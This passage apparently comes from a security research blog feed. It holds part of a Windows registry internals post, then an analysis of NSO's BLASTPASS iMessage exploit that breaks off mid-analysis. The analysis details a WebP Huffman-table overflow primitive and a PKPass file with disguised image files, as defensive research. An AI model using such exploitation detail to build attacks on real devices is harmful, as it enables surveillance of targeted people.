    According to the documentation, a single registry path reference can contain a maximum of 32 levels of nesting. Therefore, the path info structure allows for the storage of 32 elements: the first 8 are stored directly within the structure, and, if the path is deeply nested, the remaining 24 are placed in a supplementary structure allocated on demand from the kernel pools. The functions that operate on this object are CmpComputeComponentHashes, CmpExpandPathInfo, CmpValidateComponents, CmpGetComponentNameAtIndex, CmpGetComponentHashAtIndex, and CmpCleanupPathInfo.

    Interestingly, I discovered an off-by-one bug in the CmpComputeComponentHashes function, which allows an attacker to write 25 values into a 24-element array. However, due to a fortunate coincidence, path info structures are allocated from a special lookaside list with allocation sizes significantly larger than the length of the structure itself. As a result, this buffer overflow is not exploitable in practice, which has also been confirmed by Microsoft. More information about this issue, as well as the reversed definition of this structure, can be found in my original report.

    Key notifications

    In PDB | Structure name | Description

    _CM_NOTIFY_BLOCK

    The first time RegNotifyChangeKeyValue or the underlying NtNotifyChangeMultipleKeys syscall is called on a given handle, a notify block structure is assigned to the corresponding key body object. This structure serves as the central control point for all notification requests made on that handle in the future. It also stores the configuration defined in the initial API call, which, once set, cannot be changed without closing and reopening the key. This is in line with the official MSDN documentation:

    "This function should not be called multiple times with the same value for the hKey but different values for the bWatchSubtree and dwNotifyFilter parameters. The function will succeed but the changes will be ignored. To change the watch parameters, you must first close the key handle by calling RegCloseKey, reopen the key handle by calling RegOpenKeyEx, and then call RegNotifyChangeKeyValue with the new parameters."

    The !reg notifylist command in WinDbg can list all active notify blocks in the system, allowing you to check which keys are currently being monitored for changes.

    Post block

    Each post block object corresponds to a single wait for changes to a given key. Many post block objects can be assigned to one notify block object at the same time. The network of relationships in this structure becomes even more complex when using the NtNotifyChangeMultipleKeys syscall with a non-empty SubordinateObjects argument, in which case two separate post blocks share a third data structure (the so-called post block union). However, the details of this topic are beyond the scope of this post.

    The WinDbg !reg postblocklist command allows you to see how many active post blocks are assigned to each process/thread, but unfortunately, it does not show any detailed information about their contents.

    Registry callbacks

    In PDB | Structure name | Description

    REG_*_INFORMATION

    These structures are used for supplying callbacks with precise information about operations performed on the registry, and are part of the documented Windows interface. Consequently, not only their definitions but also detailed descriptions of the meaning of each field are published directly by Microsoft. A complete list of these structures can be found on MSDN, e.g., on the EX_CALLBACK_FUNCTION callback function (wdm.h) page.

    However, I have found in my research that in addition to the official registry callback interface, there is also a less official extension that Microsoft uses internally in VRegDriver, the module that supports differencing hives. If a given client, instead of using the official CmRegisterCallbackEx function, calls the internal CmpRegisterCallbackInternal function with the fifth argument set to 1, this callback will be internally marked as "extended". Extended callbacks, in addition to the information provided by the standard structures, also receive a handful of additional information related to differencing hives and layered keys. At the time of writing, the differences occur in the structures representing the RegNtPreLoadKey, RegNtPreCreateKeyEx, RegNtPreOpenKeyEx actions and their "post" counterparts.

    Callback descriptor

    The structure represents a single registry callback registered through the CmRegisterCallback or CmRegisterCallbackEx API. Once allocated, it is attached to a double-linked list represented by the global CallbackListHead object.

    Object context descriptor

    A descriptor structure for a key body-specific context that can be assigned through the CmSetCallbackObjectContext API. This descriptor is then inserted into a linked list that starts at _CM_KEY_BODY.ContextListHead.

    Callback context

    An internal structure used in the CmpCallCallBacksEx function to store the current state during the callback invocation process. For example, it's used to invoke the appropriate "post" type callbacks in case of an error in one of the "pre" type callbacks. These objects are freed by the dedicated CmpFreeCallbackContext function, which additionally caches a certain number of allocations in the global CmpCallbackContextSList list. This allows future requests for objects of this type to be quickly fulfilled.

    Registry virtualization

    In PDB | Structure name | Description

    Replication stack

    A core task of registry virtualization is the replication of keys, which involves creating an identical copy of a given key structure. This occurs under the path HKU\<SID>_Classes\VirtualStore when an application, subject to virtualization, attempts to create a key in a location where it lacks proper permissions. The entire operation is coordinated by the CmpReplicateKeyToVirtual function and consists of two main stages. First, a "replication stack" object is created and initialized in the CmpBuildVirtualReplicationStack function. This object specifies the precise key structure to be created within the virtualization process. Second, the actual creation of these keys based on this object occurs within the CmpDoBuildVirtualStack function.

    Transactions

    In PDB | Structure name | Description

    _KTRANSACTION

    A structure corresponding to a KTM transaction object, which is created by the CreateTransaction function or its low-level equivalent NtCreateTransaction.

    Lightweight transaction object

    A direct counterpart of _KTRANSACTION, but for lightweight transactions, created by the NtCreateRegistryTransaction system call. It is very simple and only consists of a bitmask of the current transaction state, a push lock for synchronization, and a pointer to the corresponding _CM_TRANS object.

    _CM_KCB_UOW

    The structure represents a single, active transactional operation linked to a specific key. In some scenarios, one logical operation corresponds to one such object (e.g., the UoWSetSecurityDescriptor type). In other cases, multiple UoWs are created for a single operation (e.g., UoWAddThisKey assigned to a newly created key, and UoWAddChildKey assigned to its parent).

    This critical structure has multiple functions. The key ones are connecting to KCB intent locks and keeping any pending state related to a given operation, both before and during the transaction commit phase.

    _CM_UOW_*

    Auxiliary sub-structures of _CM_KCB_UOW, which store information about the temporary state of the registry associated with a specific type of transactional operation. Specifically, the four structures are: _CM_UOW_KEY_STATE_MODIFICATION, _CM_UOW_SET_SD_DATA, _CM_UOW_SET_VALUE_KEY_DATA and _CM_UOW_SET_VALUE_LIST_DATA.

    _CM_TRANS

    A descriptor of a specific registry transaction, usually associated with a particular hive. In special cases, if operations are performed on multiple hives within a single transaction, then multiple _CM_TRANS objects may exist for it. Given the address of the _CM_TRANS object, it is possible to list all operations associated with this transaction in WinDbg using the !reg uowlist command.

    _CM_RM

    A descriptor of a specific resource manager. It only exists if the given hive has KTM transactions enabled, and never exists for app hives or hives loaded with the REG_HIVE_NO_RM flag.

    Think of this structure as being associated with one set of .blf / .regtrans-ms log files, which usually means one _CM_RM structure is assigned to one hive. The exception is system hives (e.g. SOFTWARE, SYSTEM etc.) which all share the same resource manager that exists under the CmRmSystem global variable.

    Given the address of a _CM_RM object in WinDbg, you can list all associated transactions using the !reg translist command.

    _CM_INTENT_LOCK

    This structure represents an intent lock, with two instances (KCBLock and KeyLock) residing in the KCB. Their primary function is to ensure key consistency by preventing the assignment of two different transactions that contain conflicting modifications of a key. Given the object's address, WinDbg's !reg ixlock command can display some details about it.

    Serialized log records

    KTM transacted registry operations are logged to .blf files on disk to enable consistent state restoration in case of unexpected shutdown during transaction commit. The CmAddLogForAction function serializes the _CM_KCB_UOW object into a flat buffer and writes it to the log file using the CLFS interface. While the _CM_KCB_UOW structure can be found in public symbols, their corresponding serialized representations cannot. Notably, there was an information disclosure vulnerability (CVE-2023-28271) that was directly related to these structures.

    Rollback packet

    When a client performs a non-transactional operation that modifies a key, and there's an active transaction associated with that key, the transaction must be rolled back before the operation can be executed to prevent an inconsistent state. This is achieved using a structure that contains a list of transactions to be rolled back. This structure is passed to the CmpAbortRollbackPacket function, which carries out the rollback. Although the official layout of this structure is unknown, in practice it is quite simple, consisting of three fields: the current capacity, the current fill level of the list, and a pointer to a dynamically allocated array of transactions.
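    Based on the three-field description above, a plausible reconstruction of such a packet might look like the following. The layout and names (RollbackPacket, RollbackPacketAdd) are purely illustrative guesses, not the kernel's actual definitions:

```cpp
#include <cstdint>
#include <cstdlib>

// Hypothetical reconstruction of a rollback packet: a growable array of
// transactions to abort, tracked by capacity and current fill level.
struct RollbackPacket {
  uint32_t Capacity;    // number of slots in the Transactions array
  uint32_t Count;       // current fill level of the list
  void** Transactions;  // dynamically allocated array of _CM_TRANS pointers
};

// Append a transaction to the packet, growing the array when full
// (the doubling policy here is illustrative, not reverse-engineered).
bool RollbackPacketAdd(RollbackPacket* packet, void* trans) {
  if (packet->Count == packet->Capacity) {
    uint32_t new_capacity = packet->Capacity ? packet->Capacity * 2 : 4;
    void** new_array = static_cast<void**>(
        realloc(packet->Transactions, new_capacity * sizeof(void*)));
    if (new_array == nullptr) return false;
    packet->Transactions = new_array;
    packet->Capacity = new_capacity;
  }
  packet->Transactions[packet->Count++] = trans;
  return true;
}
```

    In the kernel, the collected list is then handed to CmpAbortRollbackPacket, which aborts each recorded transaction before the non-transacted operation proceeds.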

    Differencing hives (VRegDriver)

    In PDB | Structure name | Description

    IOCTL input structures

    The VRegDriver module works by creating the \Device\VRegDriver device, and communicates with its clients by supporting nine distinct IOCTLs within the corresponding VrpIoctlDeviceDispatch handler function. These IOCTLs, exclusively accessible to administrator users, facilitate loading and unloading differencing hives, configuring registry redirections for specific containers, and a few other operations. Each IOCTL requires a specific input data structure, none of which are officially documented. Therefore, practical use of this interface necessitates reverse engineering the required structures to understand their initialization. An example of a reversed structure, corresponding to IOCTL 0x220008 and provisionally named VRP_LOAD_DIFFERENCING_HIVE_INPUT, was showcased in blog post #4. This enabled the creation of a proof-of-concept exploit for a differencing hive vulnerability (CVE-2023-36404), demonstrating the ability to load custom hives and, consequently, expose the flaw.

    Silo context

    This silo-specific context structure is set by the VRegDriver during silo initialization using the PsInsertPermanentSiloContext function. It is later retrieved by PsGetPermanentSiloContext and used during both IOCTL handling and path translation for containerized processes. A brief analysis suggests that it primarily contains the GUID of the associated silo, a push lock used for synchronization, and a user-configured list of namespaces for the given container, which is a set of source and target paths between which redirection should occur.

    Key context

    This structure stores the context specific to a particular key being subject to path translation within a silo. It is usually allocated for each key opened within the context of a containerized process, and assigned to its key body using the CmSetCallbackObjectContext API. It primarily stores the original path of the key before translation (the path the client believes it has access to) and several other auxiliary fields.

    Callback context (open/create)

    The callback-specific context structure stores shared data between "pre" and "post" callbacks for a given operation. This context is generally accessed through the CallContext field within the REG_*_INFORMATION structure relevant to the specific operation. In practice, VRegDriver only has one instance of a special structure defined for this purpose, used when handling the RegNtPreCreateKeyEx/RegNtPreOpenKeyEx callbacks. It saves specific data (RootObject, CompleteName, RemainingName) before the open/create request, to restore their original values in the "post" callback.

    Extra parameter

    This structure also appears to be used for temporarily storing the original key path during translation. However, its scope encompasses the entire key creation/opening process, rather than just a single callback. This means it can store information across callbacks, even when symbolic links or write-through hives are encountered during path traversal, causing the CmpParseKey function to return STATUS_REPARSE or STATUS_REPARSE_GLOBAL and restart the path lookup process. Although the concept of a whole operation context seems broadly applicable, currently there is only one type of "extra parameter" being used, represented by the GUID VRP_ORIGINAL_KEY_NAME_PARAMETER_GUID {85b8669a-cfbb-4ac0-b689-6daabfe57722}.

    Layered keys


    _CM_KCB_LAYER_INFO

    This is likely the only structure related to layered keys whose definition is public. It is part of every KCB and contains information about the placement of the key in the global, "vertical" tree of layered key instances. In practice, this means that it stores a pointer to the KCB at one level lower (its parent, so to speak), and the head of a linked list with KCBs at one level higher (KCB.LayerHeight+1), if any exist.

    Key node stack

    A stack containing all instances of a given layered key, starting from its level all the way down to level zero (the base key). Each key in this structure is represented by a (Hive, KeyCell) pair. If the key actually exists at a given level (KeyCell ≠ -1, indicating a state other than Merge-Unbacked), it is also represented by a direct, resolved pointer to its _CM_KEY_NODE structure.

    Since Windows 10 introduced support for layered keys, many places in the code that previously identified a single key as _CM_KEY_NODE* now require passing the entire key node stack structure. This is because operations on layered keys usually require knowledge of the state of lower level keys (e.g. their layered semantics, subkeys, values), not just the key represented by the handle used by the caller.

    Places where the key node stack structure is used can be identified by calls to its related helper functions, such as those for initialization (CmpInitializeKeyNodeStack) and cleanup (CmpCleanupKeyNodeStack), as well as any others containing the string "KeyNodeStack".

    KCB stack

    This structure, analogous to the key node stack, represents keys using KCBs. Its use is most clearly revealed by references to the CmpStartKcbStack and CmpStartKcbStackForTopLayerKcb functions in code, though many other internal routines with "KcbStack" in their names also operate on it.

    Both the KCB stack and the key node stack share an optimization where the first two levels are stored inline, with additional levels allocated in kernel pools only when necessary. This is likely due to the fact that most systems, even those with layered keys, typically only use one level of nesting (two levels total). Thus, this optimization avoids costly memory allocation and deallocation in these common scenarios.
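A toy model of that inline-first-two-levels scheme (illustrative Python, not the kernel's actual layout; the `(hive, key_cell)` pairs follow the key node stack description above):

```python
# Sketch of the shared optimization: the first two levels live inline in the
# structure itself, and a pool allocation is made only for deeper nesting.
class KeyNodeStack:
    INLINE_LEVELS = 2

    def __init__(self):
        self._inline = [None] * self.INLINE_LEVELS  # storage embedded in the struct
        self._overflow = None                       # models the kernel-pool allocation

    def push(self, hive, key_cell):
        entry = (hive, key_cell)
        for i in range(self.INLINE_LEVELS):
            if self._inline[i] is None:
                self._inline[i] = entry
                return
        if self._overflow is None:
            self._overflow = []   # only allocated for 3+ levels
        self._overflow.append(entry)

    def levels(self):
        return [e for e in self._inline if e is not None] + (self._overflow or [])
```

With the common one-level-of-nesting case, `_overflow` is never allocated, which is exactly the cost this design avoids.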

    Enum stack

    This data structure allows for the enumeration of subkeys within a given layered key. Its primary use is within the CmpEnumerateLayeredKey function, which serves as the handler for the NtEnumerateKey operation specifically for layered keys. At an even higher level, this corresponds to the RegEnumKeyExW API function. The complexity of this structure is evident from the fact that there are 19 internal helper functions, all starting with the name CmpKeyEnumStack, that operate on it.

    Enum resume context

    This data structure, directly tied to the subkey enumeration, primarily serves as an optimization mechanism. After executing a specific number (N) of enumeration steps, it stores the internal state of the enum stack. This allows subsequent requests for subkey N+1 to resume the enumeration process from the previous point, bypassing the need to repeat the initial steps. Linked to a specific handle, it is stored within _CM_KEY_BODY.EnumerationResumeContext.

    The KCB.SequenceNumber field, directly related to this structure, monitors whether a given key has significantly changed since a previous point in time. This enables the CmpKeyEnumStackVerifyResumeContext helper function to determine if the current registry state is consistent enough for the existing enumeration resume context to be used for further enumeration, or if the entire process needs to be restarted.
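The resume logic can be sketched as follows (illustrative only, with a plain dict standing in for the KCB and its SequenceNumber):

```python
# Sketch of the resume-context idea: cache enumeration progress keyed to a
# sequence number, and restart from scratch if the key changed in between.
class EnumResumeContext:
    def __init__(self, index, sequence):
        self.index = index        # how many subkeys were already enumerated
        self.sequence = sequence  # the key's sequence number at save time

def enumerate_subkey(key, n, ctx=None):
    # 'key' is a dict with 'subkeys' and 'sequence', for illustration
    if ctx is not None and ctx.sequence == key["sequence"] and ctx.index <= n:
        start = ctx.index         # resume: skip the first ctx.index steps
    else:
        start = 0                 # key changed (or no context): restart
    for i in range(start, n + 1):
        pass                      # the real code walks the layered enum stack here
    return key["subkeys"][n], EnumResumeContext(n + 1, key["sequence"])
```

Requesting subkey N+1 with a still-valid context then costs one step instead of N+2.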

    Value enum stack

    This data structure, used to enumerate values for layered keys, is similar in complexity to the structures used to list subkeys. The main function utilizing it is CmEnumerateValueFromLayeredKey. Additionally, there are 10 helper functions named CmpValueEnumStack[...] that operate on this structure.

    Sorted value enum stack

    The structure is similar to the standard value enum stack, but is used to iterate over the values of a given layered key while preserving lexicographical order. Helper functions from the CmpSortedValueEnumStack[...] family (9 in total) correspond to this structure. This functionality is used exclusively in the CmpGetValueCountForKeyNodeStack function, which is responsible for returning the number of values for a given key.

    The reason for the existence of this mechanism in parallel with the regular "value enum stack" is not entirely clear, but I suspect it serves as an optimization for value counting operations. This is supported by the fact that while layered keys first appeared in Windows 10 1607 (Redstone, build 14393), the sorted value enum stack was not introduced until the later version of Windows 10 1703 (Redstone 2, build 15063). In the first iteration of the layered key implementation, CmpGetValueCountForKeyNodeStack was implemented using the standard value enum stack. This lends credibility to the hypothesis that these mechanisms are functionally equivalent, but the "sorted" version is faster at counting unique values when direct access to them is not required.

    Subtree enumerator

    This structure enables the enumeration of both the direct subkeys of a layered key and all its deeper descendants. It is relatively complex, and its associated functions begin with CmpSubtreeEnumerator[...] (also 9 in total). This mechanism is primarily needed to implement the "rename" operation on layered keys. First, it allows verification that the caller has KEY_READ and DELETE permissions for all descendant keys in the subtree, and second, it enables setting the LayerSemantics value for these descendants to Supersede-Tree (0x3).

    Discard/replace context

    This data structure is employed during key deletion to ensure that KCB structures corresponding to higher-level Merge-Unbacked keys reliant on the deleted key are also marked as deleted. Subsequently, "fresh" KCB objects representing the non-existent key are inserted into the tree in their place. The two primary functions associated with this mechanism are CmpPrepareDiscardAndReplaceKcbAndUnbackedHigherLayers and CmpCommitDiscardAndReplaceKcbAndUnbackedHigherLayers.

    Conclusion

    The goal of this post was to provide a thorough overview of the structures used in the Configuration Manager subsystem in Windows, with particular emphasis on the most important and frequently used ones, i.e. those describing hives and keys. I wanted to share this knowledge because there are not many publicly available sources that accurately describe the registry's operation from the implementation side, especially relevant to the most recent code developments in Windows 10 and 11. I would also like to once again use this opportunity to appeal to Microsoft to make more information available through public PDB symbols – this would greatly facilitate the work of security researchers in the future.

    This post concludes the part of the series focusing solely on the inner workings of the registry. In the next, seventh installment, we will shift our perspective and examine the registry's role in the overall security of the system, with a deep focus on vulnerability research. Stay tuned!


    Blasting Past Webp

    26 March 2025, 14:30

    An analysis of the NSO BLASTPASS iMessage exploit

    Posted by Ian Beer, Google Project Zero

    On September 7, 2023 Apple issued an out-of-band security update for iOS:

    [Image: Release notes for iOS 16.6.1 and iPadOS 16.6.1, listing CVE-2023-41064 for ImageIO and CVE-2023-41061 for Wallet.]

    Around the same time on September 7th 2023, Citizen Lab published a blog post linking the two CVEs fixed in iOS 16.6.1 to an "NSO Group Zero-Click, Zero-Day exploit captured in the wild":

    "[The target was] an individual employed by a Washington DC-based civil society organization with international offices...

    The exploit chain was capable of compromising iPhones running the latest version of iOS (16.6) without any interaction from the victim.

    The exploit involved PassKit attachments containing malicious images sent from an attacker iMessage account to the victim."

    The day before, on September 6th 2023, Apple reported a vulnerability to the WebP project, indicating in the report that they planned to ship a custom fix for Apple customers the next day.

    The WebP team posted their first proposed fix in the public git repo the next day, and five days after that on September 12th Google released a new Chrome stable release containing the WebP fix. Both Apple and Google marked the issue as exploited in the wild, alerting other integrators of WebP that they should rapidly integrate the fix as well as causing the security research community to take a closer look...

    A couple of weeks later on September 21st 2023, former Project Zero team lead Ben Hawkes (in collaboration with @mistymntncop) published the first detailed writeup of the root cause of the vulnerability on the Isosceles Blog. A couple of months later, on November 3rd, a group called Dark Navy published their first blog post: a two-part analysis (Part 1 - Part 2) of the WebP vulnerability and a proof-of-concept exploit targeting Chrome (CVE-2023-4863).

     

    Whilst the Isosceles and Dark Navy posts explained the underlying memory corruption vulnerability in great detail, they were unable to solve another fascinating part of the puzzle: just how exactly do you land an exploit for this vulnerability in a one-shot, zero-click setup? As we'll soon see, the corruption primitive is very limited. Without access to the samples it was almost impossible to know.

    In mid-November, in collaboration with Amnesty International Security Lab, I was able to obtain a number of BLASTPASS PKPass sample files as well as crash logs from failed exploit attempts.

    This blog post covers my analysis of those samples and the journey to figure out how one of NSO's recent zero-click iOS exploits really worked. For me that journey began by immediately taking three months of paternity leave, and resumed in March 2024 where this story begins:

    Setting the scene

    For a detailed analysis of the root-cause of the WebP vulnerability and the primitive it yields, I recommend first reading the three blog posts I mentioned earlier (Isosceles, Dark Navy 1, Dark Navy 2.) I won't restate their analyses here (both because you should read their original work, and because it's quite complicated!) Instead I'll briefly discuss WebP and the corruption primitive the vulnerability yields.

    WebP

    WebP is a relatively modern image file format, first released in 2010. In reality WebP is actually two completely distinct image formats: a lossy format based on the VP8 video codec and a separate lossless format. The two formats share nothing apart from both using a RIFF container and the string WEBP for the first chunk name. From that point on (12 bytes into the file) they are completely different. The vulnerability is in the lossless format, with the RIFF chunk name VP8L.
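A minimal RIFF walker makes the split visible: the two formats share only the 12-byte `RIFF....WEBP` prefix, and everything after that is chunk-specific (sketch, not libwebp's parser):

```python
# Walk the RIFF chunks of a WebP file; a lossy file carries a VP8 chunk,
# a lossless one a VP8L chunk. The formats diverge 12 bytes in.
import struct

def webp_chunks(data):
    assert data[:4] == b"RIFF" and data[8:12] == b"WEBP"
    off = 12
    chunks = []
    while off + 8 <= len(data):
        fourcc = data[off:off + 4]
        size, = struct.unpack("<I", data[off + 4:off + 8])
        chunks.append((fourcc.decode("ascii").rstrip(), size))
        off += 8 + size + (size & 1)   # chunk payloads are 2-byte aligned
    return chunks
```

Running it on a minimal lossless file yields a single `VP8L` chunk, which is where the vulnerable code lives.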

    Lossless WebP makes extensive use of Huffman coding; there are at least 10 huffman trees present in the BLASTPASS sample. In the file they're stored as canonical huffman trees, meaning that only the code lengths are retained. At decompression time those lengths are converted directly into a two-level huffman decoding table, with the five largest tables all getting squeezed together into the same pre-allocated buffer. The (it turns out not quite) maximum size of these tables is pre-computed based on the number of symbols they encode. If you're up to this part and you're slightly lost, the other three blogposts referenced above explain this in detail.
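The canonical-code reconstruction from code lengths works like this (illustrative Python of the standard algorithm; libwebp builds two-level lookup tables rather than explicit codes, but the assignment rule is the same):

```python
# Rebuild canonical Huffman codes from code lengths alone: symbols of the
# same length get consecutive codes, shorter lengths come first.
def canonical_codes(lengths):
    max_len = max(lengths)
    counts = [0] * (max_len + 1)           # how many symbols use each length
    for l in lengths:
        if l:
            counts[l] += 1
    code = 0
    next_code = [0] * (max_len + 1)        # first code for each length
    for l in range(1, max_len + 1):
        code = (code + counts[l - 1]) << 1
        next_code[l] = code
    out = {}
    for sym, l in enumerate(lengths):
        if l:
            out[sym] = (next_code[l], l)   # (code value, bit length)
            next_code[l] += 1
    return out
```

Since only the lengths are stored in the file, an attacker controls exactly the inputs to this reconstruction, including length assignments that do not describe any valid tree.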

    With control over the symbol lengths it's possible to define all sorts of strange trees, many of which aren't valid. The fundamental issue was that the WebP code only checked the validity of the tree after building the decoding table. But the pre-computed size of the decoding table was only correct for valid trees.

    As the Isosceles blog post points out, this means that a fundamental part of the vulnerability is that triggering the bug is detected, though after memory has been corrupted, and image parsing stops only a few lines of code later. This presents another exploitation mystery: in a zero-click context, how do you exploit a bug where every time the issue is triggered it also stops parsing any attacker-controlled data?

    The second mystery involves the actual corruption primitive. The vulnerability will write a HuffmanCode structure at a known offset past the end of the huffman tables buffer:

    // Huffman lookup table entry

    typedef struct {

      uint8_t bits;

      uint16_t value;

    } HuffmanCode;

    As DarkNavy point out, whilst the bits and value fields are nominally attacker-controlled, in reality there isn't that much flexibility. The fifth huffman table (the one at the end of the preallocated buffer, part of which can get written out-of-bounds) only has 40 symbols, limiting value to a maximum of 39 (0x27), and bits will be between 1 and 7 (for a second-level table entry). There's a padding byte between bits and value which makes the largest value that could be written out-of-bounds 0x00270007. And it just so happens that that's exactly the value which the exploit does write — and they likely didn't have that much choice about it.

    There's also not much flexibility in the huffman table allocation size. The table allocation in the exploit is 12072 (0x2F28) bytes, which will get rounded up to fit within a 0x3000 byte libmalloc small region. The code lengths are chosen such that the overflow occurs like this:

    [Image: Memory layout diagram showing the Huffman tables at offset 0x3000 and the Huffman lookup table entry written at offset 0x3058.]

    To summarize: The 32-bit value 0x270007 will be written 0x58 bytes past the end of a 0x3000 byte huffman table allocation. And then WebP parsing will fail, and the decoder will bail out.
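That constant falls straight out of the HuffmanCode layout quoted above; a quick illustrative check in Python:

```python
# Pack a HuffmanCode (uint8 bits, 1 padding byte, uint16 value) and read it
# back as a little-endian 32-bit word, as the out-of-bounds write lands it.
import struct

def huffman_code_as_u32(bits, value):
    raw = struct.pack("<BxH", bits, value)   # bits, pad, value
    return struct.unpack("<I", raw)[0]

print(hex(huffman_code_as_u32(7, 39)))       # maximum bits=7, value=39 → 0x270007
```

So even the "maximum" corruption value is fixed by the table shape, not freely chosen by the attacker.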

    Déjà vu?

    Long-term readers of the Project Zero blog might be experiencing a sense of déjà vu at this point... haven't I already written a blog post about an NSO zero-click iPhone zero day exploiting a vulnerability in a slightly obscure lossless compression format used in an image parsed from an iMessage attachment?

    Indeed.

    BLASTPASS has many similarities with FORCEDENTRY, and my initial hunch (which turned out to be completely wrong) was that this exploit might take a similar approach to build a weird machine using some fancier WebP features. To that end I started out by writing a WebP parser to see what features were actually used.

    Transformation

    In a very similar fashion to JBIG2, WebP also supports invertible transformations on the input pixel data:

    [Image: WebP documentation excerpt explaining "4 Transforms" and their role in image compression.]

    [Image: Table listing pixel prediction modes with corresponding formulas for calculating predicted values.]

    My initial theory was that the exploit might operate in a similar fashion to FORCEDENTRY and apply sequences of these transformations outside of the bounds of the image buffer to build a weird machine. But after implementing enough of the WebP format in python to parse every bit of the VP8L chunk it became pretty clear that it was only triggering the Huffman table overflow and nothing more. The VP8L chunk was only 1052 bytes, and pretty much all of it was the 10 Huffman tables needed to trigger the overflow.

    What's in a pass?

    Although BLASTPASS is often referred to as an exploit for "the WebP vulnerability", the attackers don't actually just send a WebP file (even though that is supported in iMessage). They send a PassKit PKPass file, which contains a WebP. There must be a reason for this. So let's step back and actually take a look at one of the sample files I received:

    171K sample.pkpass

    $ file sample.pkpass

    sample.pkpass: Zip archive data, at least v2.0 to extract, compression method=deflate

    There are five files inside the PKPass zip archive:

    60K  background.png

    5.5M logo.png

    175B manifest.json

    18B  pass.json

    3.3K signature

    The 5.5MB logo.png is the WebP image, just with a .png extension instead of .webp:

    $ file logo.png

    logo.png:         RIFF (little-endian) data, Web/P image

    The closest thing to a specification for the PKPass format appears to be the Wallet Developer Guide, and whilst it doesn't explicitly state that the .png files should actually be Portable Network Graphics images, that's presumably the intention. This is yet another parallel with FORCEDENTRY, where a similar trick was used to reach the PDF parser when attempting to parse a GIF.
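The underlying trick is that the image decoder dispatches on content, not extension. A sketch of magic-byte sniffing of this kind (my own illustration, not ImageIO's actual logic):

```python
# Identify an image by its leading magic bytes, ignoring the file extension.
# This is why a WebP (or TIFF) named *.png still reaches the WebP/TIFF codecs.
def sniff(data):
    if data[:8] == b"\x89PNG\r\n\x1a\n":
        return "png"
    if data[:4] == b"RIFF" and data[8:12] == b"WEBP":
        return "webp"
    if data[:4] in (b"II*\x00", b"MM\x00*"):   # little/big-endian TIFF
        return "tiff"
    return "unknown"
```

Content sniffing is convenient for interoperability, but here it widens the attack surface reachable through a "png" entry in a pass.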

    PKPass files require a valid signature which is contained in manifest.json and signature. The signature has a presumably fake name and more timestamps indicating that the PKPass is very likely being generated and signed on the fly for each exploit attempt.

    pass.json is just this:

    {"pass": "PKpass"}

    Finally background.png:

    $ file background.png

    background.png: TIFF image data, big-endian, direntries=15, height=16, bps=0, compression=deflate, PhotometricIntepretation=RGB, orientation=upper-left, width=48

    Curious. Another file with a misleading extension; this time a TIFF file with a .png extension.

    We'll return to this TIFF later in the analysis as it plays a critical role in the exploit flow, but for now we'll focus on the WebP, with one short diversion:

    Blastdoor

    So far I've only mentioned the WebP vulnerability, but the Apple advisory I linked at the start of this post mentions two separate CVEs:

    The first, CVE-2023-41064 in ImageIO, is the WebP bug (confusingly, it carries a different CVE from the upstream WebP fix, CVE-2023-4863; they're the same vulnerability though).

    The second, CVE-2023-41061 in "Wallet", is described in the Apple advisory as: "A maliciously crafted attachment may result in arbitrary code execution".

    The Isosceles blog post hypothesises:

    "Citizen Lab called this attack "BLASTPASS", since the attackers found a clever way to bypass the "BlastDoor" iMessage sandbox. We don't have the full technical details, but it looks like by bundling an image exploit in a PassKit attachment, the malicious image would be processed in a different, unsandboxed process. This corresponds to the first CVE that Apple released, CVE-2023-41061."

    This theory makes sense — FORCEDENTRY had a similar trick where the JBIG2 bug was actually exploited inside IMTranscoderAgent instead of the more restrictive sandbox of BlastDoor. But in all my experimentation, as well as all the in-the-wild crash logs I've seen, this hypothesis doesn't seem to hold.

    The PKPass file and the images enclosed within do get parsed inside the BlastDoor sandbox and that's where the crashes occur or the payload executes — later on we'll also see evidence that the NSExpression payload which eventually gets evaluated expects to be running inside BlastDoor.

    My guess is that CVE-2023-41061 more likely refers to the lax parsing of PKPasses, which didn't reject images that weren't PNGs.

    In late 2024, I received another set of in-the-wild crash logs including two which do in fact strongly indicate that there was also a path to hit the WebP vulnerability in the MobileSMS process, outside the BlastDoor sandbox! Interestingly, the timestamps indicate that these devices were targeted in November 2023, two months after the vulnerability was patched.

    In those cases the WebP code was reached inside the MobileSMS process via a ChatKit CKPassPreviewMediaObject created by a CKAttachmentMessagePartChatItem.

    What's in a WebP?

    I mentioned that the VP8L chunk in the WebP file is only around 1KB. Yet in the file listing above the WebP file is 5.5MB! So what's in the rest of it? Expanding out my WebP parser we see that there's one more RIFF chunk:

    EXIF : 0x586bb8

    exif is Intel byte alignment

    EXIF has n_entries=1

    tag=8769 fmt=4 n_components=1 data=1a

    subIFD has n_entries=1

    tag=927c fmt=7 n_components=586b8c data=2c

    It's a (really really huge) EXIF - the standard format which cameras use to store image metadata — stuff like the camera model, exposure time, f-stop etc.

    It's a tag-based format and pretty much all 5.5MB is inside one tag with the id 0x927c. So what's that?

    Looking through an online list of EXIF tags just below the lens FocalLength tag and above the UserComment tag we spot 0x927c:

    [Image: Table of EXIF tag definitions, with the row for tag 0x927C, "MakerNote - Manufacturer specific information", highlighted in red.]

    It's the very-vague-yet-fascinating sounding: "MakerNote - Manufacturer specific information."

    Looking to Wikipedia for some clarification on what that actually is, we learn that

    "the "MakerNote" tag contains information normally in a proprietary binary format."

    Modifying the webp parser to now dump out the MakerNote tag we see:

    $ file sample.makernote

    sample.makernote: Apple binary property list

    Apple's chosen format for the "proprietary binary format" is binary plist!

    And indeed: looking through the ImageIO library in IDA there's a clear path between the WebP parser, the EXIF parser, the MakerNote parser and the binary plist parser.
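That lookup chain can be sketched in a few lines: walk a little-endian IFD and pull out tag 0x927C. This is illustrative Python (helper names are mine), not ImageIO's code:

```python
# Walk a little-endian EXIF/TIFF IFD and extract the MakerNote (tag 0x927C)
# payload; in the BLASTPASS sample that payload is an Apple binary plist.
import struct

MAKERNOTE = 0x927C

def ifd_entries(tiff, ifd_off):
    n, = struct.unpack_from("<H", tiff, ifd_off)
    for i in range(n):
        # each IFD entry is 12 bytes: tag, format, component count, value/offset
        yield struct.unpack_from("<HHII", tiff, ifd_off + 2 + 12 * i)

def find_makernote(tiff, ifd_off):
    for tag, fmt, count, value in ifd_entries(tiff, ifd_off):
        if tag == MAKERNOTE:
            # for fmt=7 (undefined) with count > 4, 'value' is an offset into the file
            return tiff[value:value + count]
    return None
```

In the sample, the single subIFD entry shown in the dump above (tag=927c, fmt=7) covers essentially the entire 5.5MB file.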

    unbplisting

